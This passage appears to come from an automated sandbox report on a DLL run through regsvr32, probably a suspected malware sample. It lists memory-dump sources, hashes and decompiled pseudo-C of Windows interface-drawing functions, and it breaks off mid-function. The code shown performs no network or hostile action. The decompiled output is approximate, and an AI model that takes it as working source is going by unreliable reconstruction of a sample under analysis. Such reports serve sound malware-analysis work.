                                                                              • Instruction Fuzzy Hash: 3B2146B46183858B8389DF28D04A41ABBE1FBCC308F905B1DF4CAAB254D77896558B4B
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000EAC0 Relevance: .1, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 443cbba6f5f89cfce6496fb7e303af42859a42b87001d497a7063cf79c72ec44
                                                                              • Instruction ID: 28a8b9ee08791f4b35668e747dad36529c2fac2b53c208ad34d18e94405bcf7a
                                                                              • Opcode Fuzzy Hash: 443cbba6f5f89cfce6496fb7e303af42859a42b87001d497a7063cf79c72ec44
                                                                              • Instruction Fuzzy Hash: 8E21D870529784ABC788DF18C58A55ABBF0FBC5758F80691DF8C686251C7B4D906CB43
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002AF64 Relevance: 45.9, APIs: 24, Strings: 2, Instructions: 414windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 22%
                                                                              			E1002AF64(void* __ecx, intOrPtr* __rax, void* __rcx, void* __rdx) {
				void* __rbx;
				void* __rdi;
				int _t186;
				signed int _t194;
				signed int _t201;
				long _t243;
				long _t244;
				long _t258;
				long _t271;
				long _t282;
				long _t283;
				signed int _t297;
				intOrPtr _t314;
				intOrPtr _t315;
				intOrPtr _t317;
				long _t321;
				long _t337;
				void* _t342;
				int _t345;
				signed int _t351;
				intOrPtr* _t372;
				signed long long _t373;
				void* _t379;
				long _t380;
				intOrPtr _t384;
				signed long long _t411;
				intOrPtr* _t424;
				void* _t436;
				signed int _t437;
				void* _t439;
				void* _t440;
				void* _t441;
				void* _t445;
				void* _t446;
				void* _t447;
				signed long long _t450;
				intOrPtr _t451;
				void* _t452;

				_t372 = __rax;
				 *((long long*)(_t441 + 0xb8)) = 0xfffffffe;
				_t452 = __rdx;
				_t436 = __rcx;
				_t451 =  *((intOrPtr*)(__rdx + 0x38));
				if(_t451 == 0) {
					L35:
					return _t186;
				}
				_t186 = E100298B0(__rax, _t379, _t451, 0x10055770);
				if(_t186 == 0) {
					goto L35;
				}
				_t442 = _t379;
				E1003A240(_t186, __ecx, 0, _t441 + 0xc0, 0x10055770, _t379);
				 *((intOrPtr*)(_t441 + 0xc0)) = 0x50;
				 *((intOrPtr*)(_t441 + 0xc4)) = 0x40;
				_t445 = _t441 + 0xc0;
				r8d = 0;
				_t314 =  *((intOrPtr*)(__rdx + 8));
				_t384 =  *((intOrPtr*)(__rcx + 8));
				_t186 = GetMenuItemInfoW(??, ??, ??, ??);
				if(_t186 == 0) {
					goto L35;
				}
				E10029130(_t186);
				_t448 = _t372;
				if((0 | _t372 != 0x00000000) == 0) {
					E10009538(0x80004005, _t314, _t372, _t379, _t384, 0x10055770, __rcx, _t442, _t445, _t448);
					asm("int3");
				}
				_t373 =  *_t372;
				 *((intOrPtr*)(_t373 + 0x18))();
				_t12 = _t373 + 0x18; // 0x18
				_t380 = _t12;
				 *(_t441 + 0x70) = _t380;
				_t315 =  *((intOrPtr*)(_t441 + 0x100));
				if(( *((intOrPtr*)(_t380 - 0xc)) - _t315 | 0x00000001 -  *((intOrPtr*)(_t380 - 8))) < 0) {
					E10009920(_t315, _t441 + 0x70, _t436, _t442);
					_t315 =  *((intOrPtr*)(_t441 + 0x100));
					_t380 =  *(_t441 + 0x70);
				}
				 *(_t441 + 0xf8) = _t380;
				 *((intOrPtr*)(_t441 + 0x100)) = _t315 + 1;
				_t446 = _t441 + 0xc0;
				r8d = 0;
				_t317 =  *((intOrPtr*)(_t452 + 8));
				_t386 =  *((intOrPtr*)(_t436 + 8));
				_t345 = GetMenuItemInfoW(??, ??, ??, ??);
				if(_t380 != 0) {
					_t386 = _t380;
					_t194 = E10039820(_t193, _t380);
					if(_t194 < 0) {
						goto L34;
					}
					goto L10;
				} else {
					_t194 = 0;
					L10:
					if(_t194 >  *((intOrPtr*)(_t380 - 0xc))) {
						L34:
						return E10009538(0x80070057, _t317, _t373, _t380, _t386, 0x10055770, _t436, _t442, _t446, _t448);
					}
					 *(_t380 - 0x10) = _t194;
					 *((short*)(_t380 + _t373 * 2)) = 0;
					if(_t345 != 0) {
						CopyRect();
						GetObjectW(??, ??, ??);
						_t201 = GetSysColor(??);
						_t351 = _t201;
						 *(_t441 + 0x178) = _t201;
						r9d =  *((intOrPtr*)(_t441 + 0x7c));
						asm("cdq");
						r8d =  *(_t441 + 0x118);
						asm("cdq");
						_t297 =  *((intOrPtr*)(_t451 + 8)) + _t446 - 1;
						 *(_t441 + 0x54) = _t297;
						 *(_t441 + 0x50) = 0;
						 *((intOrPtr*)(_t441 + 0x58)) =  *((intOrPtr*)(_t441 + 0x114)) + 1;
						 *(_t441 + 0x5c) = _t441 + 0x111 + _t297;
						E1000C9E0(0x50, 0x20, _t373,  *((intOrPtr*)(_t452 + 0x20)), _t452 + 0x28, _t441 + 0x110, _t446, _t448);
						_t450 = _t373;
						 *((intOrPtr*)(_t441 + 0x180)) =  *((intOrPtr*)( *_t373 + 0x38))();
						_t444 =  *_t450;
						 *((intOrPtr*)( *_t450 + 0x50))();
						_t447 = _t441 + 0x188;
						r8d =  *(_t380 - 0x10);
						GetTextExtentPoint32W(??, ??, ??, ??);
						if(( *(_t452 + 0x10) & 0x00000001) == 0) {
							r8d = _t351;
							E10029F60(_t450, _t452 + 0x28);
							_t448 =  *_t450;
							 *((intOrPtr*)( *_t450 + 0x58))();
							if(( *(_t452 + 0x10) & 0x00000002) == 0) {
								if(( *(_t452 + 0x10) & 0x00000008) != 0) {
									_t243 = GetSysColor();
									_t244 = GetSysColor(??);
									_t130 = _t439 + 1; // 0x1
									r9d = _t130;
									 *(_t441 + 0x30) = _t243;
									 *(_t441 + 0x28) = _t244;
									 *(_t441 + 0x20) = _t440 + 1;
									r8d =  *(_t441 + 0x54);
									E1002A594( *(_t441 + 0x50), _t243, _t450);
									_t351 =  *(_t441 + 0x178);
								}
								 *((intOrPtr*)( *_t450 + 0x58))();
								_t437 =  *_t450;
								_t321 = GetSysColor(??);
								 *((intOrPtr*)(_t437 + 0x60))();
								asm("cdq");
								r8d =  *(_t441 + 0x5c) -  *(_t441 + 0x54) - _t321 >> 1;
								asm("cdq");
								r8d = r8d - ( *((intOrPtr*)(_t441 + 0x18c)) - _t321 >> 1);
								r8d = r8d +  *(_t441 + 0x54);
								_t342 = 0;
								 *(_t441 + 0x38) = _t437;
								 *(_t441 + 0x30) =  *(_t380 - 0x10);
								 *(_t441 + 0x28) = _t380;
								 *(_t441 + 0x20) = _t437;
								_t149 = _t437 + 2; // 0x2
								r9d = _t149;
								ExtTextOutW(??, ??, ??, ??, ??, ??, ??, ??);
							} else {
								GetSysColor();
								 *((intOrPtr*)( *_t450 + 0x60))();
								_t411 = _t450;
								E1000C0E0(1, _t411);
								asm("cdq");
								asm("cdq");
								r8d = _t373 + _t411 + 1;
								 *(_t441 + 0x38) = 0;
								 *(_t441 + 0x30) =  *(_t380 - 0x10);
								 *(_t441 + 0x28) = _t380;
								 *(_t441 + 0x20) = 0;
								r9d = 2;
								ExtTextOutW(??, ??, ??, ??, ??, ??, ??, ??);
								_t437 =  *_t450;
								_t258 = GetSysColor(??);
								 *((intOrPtr*)(_t437 + 0x60))();
								asm("cdq");
								r8d =  *(_t441 + 0x5c) -  *(_t441 + 0x54) - _t258 >> 1;
								r8d = r8d - ( *((intOrPtr*)(_t441 + 0x18c)) - 1 >> 1);
								r8d = r8d +  *(_t441 + 0x54);
								_t342 = 0;
								 *(_t441 + 0x38) = _t437;
								 *(_t441 + 0x30) =  *(_t380 - 0x10);
								 *(_t441 + 0x28) = _t380;
								 *(_t441 + 0x20) = _t437;
								r9d = 0;
								ExtTextOutW(??, ??, ??, ??, ??, ??, ??, ??);
							}
						} else {
							CopyRect();
							r11d =  *((intOrPtr*)(_t441 + 0x58));
							r11d = r11d + 2;
							 *((intOrPtr*)(_t441 + 0x88)) = r11d;
							r8d = GetSysColor(??);
							E10029F60(_t450, _t441 + 0x88);
							if(( *(_t452 + 0x10) & 0x0000000a) == 0) {
								_t282 = GetSysColor();
								_t283 = GetSysColor(??);
								_t69 = _t439 + 1; // 0x1
								r9d = _t69;
								 *(_t441 + 0x30) = _t282;
								 *(_t441 + 0x28) = _t283;
								 *(_t441 + 0x20) = _t440 + 1;
								r8d =  *(_t441 + 0x54);
								E1002A594( *(_t441 + 0x50), _t282, _t450);
								_t351 =  *(_t441 + 0x178);
							}
							_t437 =  *_t450;
							GetSysColor(??);
							 *((intOrPtr*)(_t437 + 0x58))();
							if(( *(_t452 + 0x10) & 0x00000002) == 0) {
								_t271 = GetSysColor();
							} else {
								_t271 = _t351;
							}
							_t444 =  *_t450;
							_t337 = _t271;
							 *((intOrPtr*)( *_t450 + 0x60))();
							asm("cdq");
							r8d =  *(_t441 + 0x5c) -  *(_t441 + 0x54) - _t337 >> 1;
							asm("cdq");
							r8d = r8d - ( *((intOrPtr*)(_t441 + 0x18c)) - _t337 >> 1);
							r8d = r8d +  *(_t441 + 0x54);
							_t342 = 0;
							 *(_t441 + 0x38) = _t437;
							 *(_t441 + 0x30) =  *(_t380 - 0x10);
							 *(_t441 + 0x28) = _t380;
							 *(_t441 + 0x20) = _t437;
							_t91 = _t437 + 2; // 0x2
							r9d = _t91;
							ExtTextOutW(??, ??, ??, ??, ??, ??, ??, ??);
						}
						 *(_t441 + 0x68) = _t437;
						 *((long long*)(_t441 + 0x60)) = 0x10055dd0;
						if(( *(_t452 + 0x10) & 0x00000002) == 0) {
							if(( *(_t452 + 0x10) & 0x00000008) != 0) {
								r9d = 0xffffff;
								r8d = _t351;
								E1000D5F8(0x50, _t451, _t441 + 0x60, _t444);
								_t451 = _t441 + 0x60;
							}
						} else {
							r8d = _t351;
							E1000D0EC(0x50, _t342, _t451, _t441 + 0x60, _t444, _t447);
							_t451 = _t441 + 0x60;
						}
						E1000C370(_t441 + 0x98);
						CreateCompatibleDC(??);
						E1000CA04(0x50, 0x10055dd0, _t441 + 0x98, 0x10055dd0, _t444, _t448);
						if(_t451 != 0) {
						}
						E1000CF18(0x10055dd0);
						r8d = 0xffffffff;
						InflateRect(??, ??, ??);
						 *((intOrPtr*)(_t441 + 0x40)) = 0xcc0020;
						 *(_t441 + 0x38) = 0;
						 *(_t441 + 0x30) = 0;
						 *(_t441 + 0x28) =  *((intOrPtr*)(_t441 + 0xa0));
						 *(_t441 + 0x20) =  *(_t441 + 0x5c);
						r9d =  *((intOrPtr*)(_t441 + 0x58));
						r8d =  *(_t441 + 0x54);
						BitBlt(??, ??, ??, ??, ??, ??, ??, ??, ??);
						 *((intOrPtr*)( *_t450 + 0x40))();
						E1000CA9C(_t441 + 0x98);
						 *((long long*)(_t441 + 0x60)) = 0x10055188;
						E1000CECC(0x10055188, _t441 + 0x60);
					}
					_t184 = _t380 - 0x18; // 0x0
					_t424 = _t184;
					asm("lock xadd [edx+0x10], eax");
					_t186 = 0x1fffffffe;
					if(0xffffffff > 0) {
						goto L35;
					} else {
						return  *((intOrPtr*)( *((intOrPtr*)( *_t424)) + 8))();
					}
				}
			}









































                                                                              0x1002af64
                                                                              0x1002af76
                                                                              0x1002af82
                                                                              0x1002af85
                                                                              0x1002af88
                                                                              0x1002af8f
                                                                              0x1002b5f1
                                                                              0x1002b5f1
                                                                              0x1002b5f1
                                                                              0x1002af9f
                                                                              0x1002afa6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002afb1
                                                                              0x1002afbe
                                                                              0x1002afc3
                                                                              0x1002afca
                                                                              0x1002afd5
                                                                              0x1002afdd
                                                                              0x1002afe0
                                                                              0x1002afe4
                                                                              0x1002afe8
                                                                              0x1002aff0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002aff6
                                                                              0x1002affb
                                                                              0x1002b008
                                                                              0x1002b00f
                                                                              0x1002b014
                                                                              0x1002b014
                                                                              0x1002b015
                                                                              0x1002b01b
                                                                              0x1002b01e
                                                                              0x1002b01e
                                                                              0x1002b022
                                                                              0x1002b032
                                                                              0x1002b03d
                                                                              0x1002b044
                                                                              0x1002b049
                                                                              0x1002b050
                                                                              0x1002b050
                                                                              0x1002b055
                                                                              0x1002b060
                                                                              0x1002b067
                                                                              0x1002b06f
                                                                              0x1002b072
                                                                              0x1002b076
                                                                              0x1002b080
                                                                              0x1002b085
                                                                              0x1002b08b
                                                                              0x1002b08e
                                                                              0x1002b095
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002b087
                                                                              0x1002b087
                                                                              0x1002b09b
                                                                              0x1002b09e
                                                                              0x1002b5d5
                                                                              0x00000000
                                                                              0x1002b5da
                                                                              0x1002b0a4
                                                                              0x1002b0a9
                                                                              0x1002b0b1
                                                                              0x1002b0c0
                                                                              0x1002b0d7
                                                                              0x1002b0e2
                                                                              0x1002b0e8
                                                                              0x1002b0ea
                                                                              0x1002b0f8
                                                                              0x1002b100
                                                                              0x1002b107
                                                                              0x1002b112
                                                                              0x1002b119
                                                                              0x1002b11e
                                                                              0x1002b122
                                                                              0x1002b134
                                                                              0x1002b13e
                                                                              0x1002b146
                                                                              0x1002b14b
                                                                              0x1002b157
                                                                              0x1002b15e
                                                                              0x1002b169
                                                                              0x1002b16d
                                                                              0x1002b175
                                                                              0x1002b181
                                                                              0x1002b18c
                                                                              0x1002b2be
                                                                              0x1002b2c8
                                                                              0x1002b2cd
                                                                              0x1002b2d6
                                                                              0x1002b2df
                                                                              0x1002b3c9
                                                                              0x1002b3e0
                                                                              0x1002b3ed
                                                                              0x1002b3f6
                                                                              0x1002b3f6
                                                                              0x1002b3fa
                                                                              0x1002b3fe
                                                                              0x1002b402
                                                                              0x1002b406
                                                                              0x1002b412
                                                                              0x1002b417
                                                                              0x1002b417
                                                                              0x1002b427
                                                                              0x1002b42a
                                                                              0x1002b439
                                                                              0x1002b43e
                                                                              0x1002b449
                                                                              0x1002b44e
                                                                              0x1002b458
                                                                              0x1002b45d
                                                                              0x1002b460
                                                                              0x1002b46f
                                                                              0x1002b471
                                                                              0x1002b476
                                                                              0x1002b47a
                                                                              0x1002b47f
                                                                              0x1002b484
                                                                              0x1002b484
                                                                              0x1002b48d
                                                                              0x1002b2e5
                                                                              0x1002b2ee
                                                                              0x1002b2f9
                                                                              0x1002b301
                                                                              0x1002b304
                                                                              0x1002b310
                                                                              0x1002b321
                                                                              0x1002b328
                                                                              0x1002b337
                                                                              0x1002b340
                                                                              0x1002b344
                                                                              0x1002b349
                                                                              0x1002b352
                                                                              0x1002b35d
                                                                              0x1002b363
                                                                              0x1002b36c
                                                                              0x1002b377
                                                                              0x1002b382
                                                                              0x1002b387
                                                                              0x1002b38a
                                                                              0x1002b38d
                                                                              0x1002b39c
                                                                              0x1002b39e
                                                                              0x1002b3a3
                                                                              0x1002b3a7
                                                                              0x1002b3ac
                                                                              0x1002b3b1
                                                                              0x1002b3b9
                                                                              0x1002b3b9
                                                                              0x1002b192
                                                                              0x1002b19e
                                                                              0x1002b1a4
                                                                              0x1002b1a9
                                                                              0x1002b1ad
                                                                              0x1002b1c0
                                                                              0x1002b1ce
                                                                              0x1002b1d8
                                                                              0x1002b1ef
                                                                              0x1002b1fc
                                                                              0x1002b205
                                                                              0x1002b205
                                                                              0x1002b209
                                                                              0x1002b20d
                                                                              0x1002b211
                                                                              0x1002b215
                                                                              0x1002b221
                                                                              0x1002b226
                                                                              0x1002b226
                                                                              0x1002b22d
                                                                              0x1002b236
                                                                              0x1002b241
                                                                              0x1002b249
                                                                              0x1002b254
                                                                              0x1002b24b
                                                                              0x1002b24b
                                                                              0x1002b24b
                                                                              0x1002b25a
                                                                              0x1002b25e
                                                                              0x1002b263
                                                                              0x1002b26f
                                                                              0x1002b274
                                                                              0x1002b27e
                                                                              0x1002b283
                                                                              0x1002b286
                                                                              0x1002b295
                                                                              0x1002b297
                                                                              0x1002b29c
                                                                              0x1002b2a0
                                                                              0x1002b2a5
                                                                              0x1002b2aa
                                                                              0x1002b2aa
                                                                              0x1002b2b3
                                                                              0x1002b2b3
                                                                              0x1002b493
                                                                              0x1002b49f
                                                                              0x1002b4a9
                                                                              0x1002b4c7
                                                                              0x1002b4c9
                                                                              0x1002b4cf
                                                                              0x1002b4da
                                                                              0x1002b4df
                                                                              0x1002b4df
                                                                              0x1002b4ab
                                                                              0x1002b4ab
                                                                              0x1002b4b6
                                                                              0x1002b4bb
                                                                              0x1002b4bb
                                                                              0x1002b4ec
                                                                              0x1002b4f4
                                                                              0x1002b505
                                                                              0x1002b50d
                                                                              0x1002b50d
                                                                              0x1002b51f
                                                                              0x1002b529
                                                                              0x1002b531
                                                                              0x1002b537
                                                                              0x1002b53f
                                                                              0x1002b547
                                                                              0x1002b557
                                                                              0x1002b560
                                                                              0x1002b564
                                                                              0x1002b569
                                                                              0x1002b577
                                                                              0x1002b58b
                                                                              0x1002b598
                                                                              0x1002b5a5
                                                                              0x1002b5af
                                                                              0x1002b5af
                                                                              0x1002b5b5
                                                                              0x1002b5b5
                                                                              0x1002b5be
                                                                              0x1002b5c3
                                                                              0x1002b5c8
                                                                              0x00000000
                                                                              0x1002b5ca
                                                                              0x00000000
                                                                              0x1002b5d0
                                                                              0x1002b5c8

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Text$Rect$CopyInfoItemMenuMode$CompatibleCreateExtentInflateObjectPoint32
                                                                              • String ID: $@
                                                                              • API String ID: 4019356144-1077428164
                                                                              • Opcode ID: b06746bdff76d0e39067d851c43f71902f8c9ee7c495622fa388be62e201fbd8
                                                                              • Instruction ID: 1ad2f24e7ac379dbc512cc9a8fa7e70559d70d0c96027f109db75c38193486ea
                                                                              • Opcode Fuzzy Hash: b06746bdff76d0e39067d851c43f71902f8c9ee7c495622fa388be62e201fbd8
                                                                              • Instruction Fuzzy Hash: 39025A36304A848BD724CF29F85878EB7A1F788B94F458215EF8987B58DF78D849CB40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10001430 Relevance: 38.9, APIs: 20, Strings: 2, Instructions: 376windowstringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 38%
                                                                              			E10001430(void* __ebx, void* __edx, long long __rbx, void* __rcx, unsigned long long __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9, void* __r11, long long __r12, long long __r13, long long __r14, long long __r15) {
				signed char _t173;
				int _t179;
				long _t183;
				signed int _t185;
				int _t188;
				long _t207;
				intOrPtr _t209;
				intOrPtr _t216;
				signed int _t221;
				signed int _t222;
				signed int _t224;
				void* _t225;
				int _t226;
				int _t227;
				signed int _t230;
				intOrPtr _t242;
				signed int _t256;
				intOrPtr _t266;
				void* _t269;
				intOrPtr* _t300;
				signed long long _t336;
				long long _t354;
				long long _t356;
				long long _t357;
				short* _t360;
				long long _t363;
				intOrPtr* _t364;
				intOrPtr* _t366;
				intOrPtr _t370;
				signed int _t373;
				intOrPtr _t378;
				unsigned int _t389;
				long long _t390;
				long long _t392;
				long long _t393;
				signed int _t395;
				void* _t398;

				_t395 = __r13;
				_t392 = __r12;
				_t388 = __r11;
				_t361 = __rsi;
				_t358 = __rdi;
				_t300 = _t366;
				 *((long long*)(_t300 + 8)) = __rbx;
				 *((long long*)(_t300 + 0x10)) = _t363;
				 *((long long*)(_t300 + 0x18)) = __rsi;
				 *((long long*)(_t300 + 0x20)) = __rdi;
				 *((long long*)(_t300 - 0x10)) = __r13;
				 *((long long*)(_t300 - 0x18)) = __r14;
				_t398 = __rcx;
				 *((long long*)(_t300 - 0x20)) = __r15;
				_t305 = __rdx;
				E1000C9E0(__ebx, __edx, _t300,  *((intOrPtr*)(__rdx + 0x20)), __rdx, __r8, __r9, __r11);
				_t364 = _t300;
				CopyRect(??, ??);
				_t266 =  *((intOrPtr*)(__rdx + 8));
				r13d = 1;
				 *((intOrPtr*)(_t366 + 0x68)) = _t266;
				GetFocus();
				E10011808(__ebx, __edx, _t300, _t300, __rdx + 0x28, __r8, __r9, __r11);
				r15d =  *(_t398 + 0xd8);
				_t221 = 0 | _t300 == _t398;
				_t378 = _t366 + 0xc0;
				r8d = 0;
				 *((long long*)(_t366 + 0xd8)) = 0x10076060;
				 *(_t366 + 0xa0) = _t221;
				 *((intOrPtr*)(_t366 + 0x80)) = 0;
				 *((intOrPtr*)(_t366 + 0x64)) = 0;
				 *((intOrPtr*)(_t366 + 0xc0)) = 0xb;
				 *((intOrPtr*)(_t366 + 0xc4)) = _t266;
				 *((intOrPtr*)(_t366 + 0xc8)) = 0;
				 *(_t366 + 0xe0) = 0x208;
				 *((intOrPtr*)(_t366 + 0xd0)) = 0xffff;
				SendMessageW(??, ??, ??, ??);
				if(_t221 != 0 || (E10016020(_t398) & 0x00000008) != 0) {
					_t173 =  *(_t366 + 0xcc);
					if((_t173 & 0x00000002) != 0) {
						goto L6;
					}
					goto L4;
				} else {
					_t173 =  *(_t366 + 0xcc);
					L4:
					if((_t173 & 0x00000008) != 0) {
						L6:
						_t222 = r13d;
						 *(_t366 + 0x60) = r13d;
						goto L7;
					} else {
						_t222 = 0;
						 *(_t366 + 0x60) = 0;
						L7:
						r9d = 0;
						E1000AEA0();
						r9d = 2;
						E1000AEA0();
						r11d =  *(_t366 + 0x70);
						 *(_t366 + 0xa8) = r11d;
						if( *((intOrPtr*)(_t398 + 0xc4)) != 0) {
							_t216 =  *((intOrPtr*)(_t366 + 0xb0));
							_t242 =  *((intOrPtr*)(_t398 + 0xc8));
							_t217 =  <  ? _t242 : _t216;
							 *((intOrPtr*)(_t366 + 0xb0)) =  <  ? _t242 : _t216;
						}
						if(_t222 == 0) {
							E1000D050(_t222,  *((intOrPtr*)(_t398 + 0xd4)), _t366 + 0x88, _t388);
							_t370 =  *((intOrPtr*)(_t366 + 0x90));
							_t353 = _t366 + 0xa8;
							FillRect(??, ??, ??);
							_t389 = 0x10055188;
							 *(_t366 + 0x88) = 0x10055188;
							E1000CECC(0x10076060, _t366 + 0x88);
						} else {
							GetSysColor();
							_t209 =  *((intOrPtr*)( *_t364 + 0x60))();
							_t305 =  *_t364;
							 *((intOrPtr*)(_t366 + 0x80)) = _t209;
							GetSysColor(??);
							 *((intOrPtr*)(_t366 + 0x64)) =  *((intOrPtr*)( *_t364 + 0x58))();
							E1000D050(_t222, GetSysColor(??), _t366 + 0x88, _t388);
							_t370 =  *((intOrPtr*)(_t366 + 0x90));
							_t353 = _t366 + 0xa8;
							FillRect(??, ??, ??);
							_t389 = 0x10055188;
							 *(_t366 + 0x88) = 0x10055188;
							E1000CECC(0x10076060, _t366 + 0x88);
							_t222 =  *(_t366 + 0x60);
						}
						 *((long long*)(_t366 + 0x170)) = _t392;
						r12d =  *(_t366 + 0xcc);
						if((r12b & 0x00000004) == 0) {
							if(_t222 != 0) {
								_t207 = GetSysColor();
								r12d =  *(_t366 + 0xcc);
								r13d = 5;
								r15d = _t207;
							}
						} else {
							r15d =  *(_t398 + 0xd8);
							r13d = 5;
						}
						r12d = r12d & 0x0000f000;
						if(r12d != 0) {
							r9d = 0;
							_t70 = _t378 + 2; // 0x2
							r8d = _t70;
							r12d = r12d >> 0xc;
							SendMessageW(??, ??, ??, ??);
							E1000B47C(_t222, 0x1002, 0x10076060, 0x10076060, _t353, _t370, _t378, _t389);
							if(0x10076060 != 0) {
								_t358 =  *((intOrPtr*)(_t364 + 8));
								_t361 =  *0x10076068;
								 *(_t366 + 0x98) =  *(_t366 + 0x50);
								 *((intOrPtr*)(_t366 + 0x9c)) =  *((intOrPtr*)(_t366 + 0x54));
								_t305 =  *(_t366 + 0x98) >> 0x20;
								E1000A57C(_t222,  *((intOrPtr*)(_t366 + 0x54)), 0x1002, 0, 0x10076060, _t370, _t378, _t389);
								 *(_t366 + 0x30) = 1;
								r8d = _t392 - 1;
								_t378 =  *((intOrPtr*)(_t364 + 8));
								_t353 =  *0x10076068;
								 *(_t366 + 0x28) = _t222;
								 *(_t366 + 0x20) =  *(_t366 + 0x50);
								E10001090( *((intOrPtr*)(_t366 + 0x54)), 0x1002, 0,  *(_t366 + 0x98) >> 0x20,  *((intOrPtr*)( *0x10076128)),  *0x10076068,  *((intOrPtr*)(_t364 + 8)),  *0x10076068, _t370, _t378, _t389, _t392, _t395, _t398);
								_t266 =  *((intOrPtr*)(_t366 + 0x68));
							}
						}
						r9d = 1;
						E1000AEA0();
						r9d = 0;
						_t87 = _t378 + 1; // 0x1
						r8d = _t87;
						SendMessageW(??, ??, ??, ??);
						E1000B47C(_t222, 0x1002, 0x10076060, 0x10076060, _t353, _t366 + 0x110, _t378, _t389);
						_t390 = 0x10076060;
						if(0x10076060 != 0 &&  *(_t366 + 0x50) <  *(_t366 + 0x58) + 0xffffffff) {
							r9d =  *(_t366 + 0x110);
							 *(_t366 + 0x48) =  *(_t366 + 0xcc) & 0x00000f00 | r13d;
							 *(_t366 + 0x40) = r15d;
							 *(_t366 + 0x38) =  *(_t398 + 0xd8);
							 *(_t366 + 0x30) = 0x10;
							 *(_t366 + 0x28) = 0x10;
							 *(_t366 + 0x20) =  *(_t366 + 0x114);
							ImageList_DrawEx(??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
						}
						r9d = 2;
						E1000AEA0();
						_t393 = 0x10076060;
						_t224 =  *(_t366 + 0x58) -  *((intOrPtr*)(_t398 + 0xcc));
						 *(_t366 + 0x58) = _t224;
						_t225 = _t224 -  *(_t366 + 0x50);
						_t179 = lstrlenW(??);
						if(_t179 == 0) {
							_t354 = 0x10076060;
						} else {
							r9d = _t179;
							r8d = 4;
							E10001B20(_t225, _t305, _t364, _t358, _t361, _t364, _t390, 0x10076060, _t395);
							_t354 = 0x10076060;
						}
						asm("movaps xmm0, [esp+0x50]");
						asm("movdqa [esp+0x70], xmm0");
						 *((intOrPtr*)(_t366 + 0x78)) =  *((intOrPtr*)(_t366 + 0x78)) - 2;
						 *(_t366 + 0x70) =  *(_t366 + 0x50) + 2;
						_t302 =  *_t364;
						r8d = 0xffffffff;
						 *(_t366 + 0x20) = 0x924;
						 *((intOrPtr*)( *_t364 + 0xd0))();
						r13d = 1;
						_t373 = _t395;
						 *((intOrPtr*)(_t366 + 0x120)) = 3;
						_t183 = SendMessageW(??, ??, ??, ??);
						if(_t183 == 0) {
							L44:
							if(( *(_t366 + 0xcc) & 0x00000001) != 0 &&  *(_t366 + 0xa0) != 0) {
								_t183 = DrawFocusRect();
							}
							if( *(_t366 + 0x60) != 0) {
								 *((intOrPtr*)( *_t364 + 0x60))();
								_t183 =  *((intOrPtr*)( *_t364 + 0x58))();
							}
							return _t183;
						} else {
							do {
								_t185 =  *(_t366 + 0x58);
								r8d = r13d;
								 *(_t366 + 0x50) = _t185;
								 *(_t366 + 0x20) = 0x208;
								 *(_t366 + 0x58) = _t185 +  *((intOrPtr*)(_t366 + 0x128));
								if(E1000AF4C(_t266, _t398, _t354, _t373, _t393) == 0) {
									goto L43;
								}
								_t269 =  *(_t366 + 0x58) -  *(_t366 + 0x50);
								_t188 = lstrlenW(??);
								_t226 = _t188;
								if(_t188 == 0) {
									L36:
									_t390 = _t393;
									L37:
									_t256 = 0;
									if(_t390 == _t393) {
										_t230 = ( *(_t366 + 0x124) & 0x00000003) - 1;
										if(_t230 == 0) {
											_t256 = 2;
										} else {
											if(_t230 == 1) {
												_t256 = _t230;
											}
										}
									}
									asm("movaps xmm0, [esp+0x50]");
									asm("movdqa [esp+0x70], xmm0");
									 *((intOrPtr*)(_t366 + 0x78)) =  *((intOrPtr*)(_t366 + 0x78)) - 6;
									 *(_t366 + 0x70) =  *(_t366 + 0x50) + 6;
									_t302 =  *_t364;
									 *(_t366 + 0x20) = _t256 | 0x00000924;
									r8d = 0xffffffff;
									_t354 = _t390;
									 *((intOrPtr*)( *_t364 + 0xd0))();
									goto L43;
								}
								r8d = _t188;
								_t356 = _t393;
								GetTextExtentPoint32W(??, ??, ??, ??);
								r11d =  *(_t366 + 0x98);
								r11d = r11d + 0xc;
								if(r11d <= _t269) {
									goto L36;
								}
								E10038D40(_t302, 0x10075e50, _t356, _t393, 0xffffffff);
								_t357 = 0x1005f630;
								r8d = 8;
								GetTextExtentPoint32W(??, ??, ??, ??);
								_t227 = _t226 + 0xffffffff;
								_t336 = _t227;
								if(_t227 <= 0) {
									L35:
									E10038E60(_t302, 0x10075e50, _t357, 0x1005f630);
									_t390 = 0x10075e50;
									goto L37;
								}
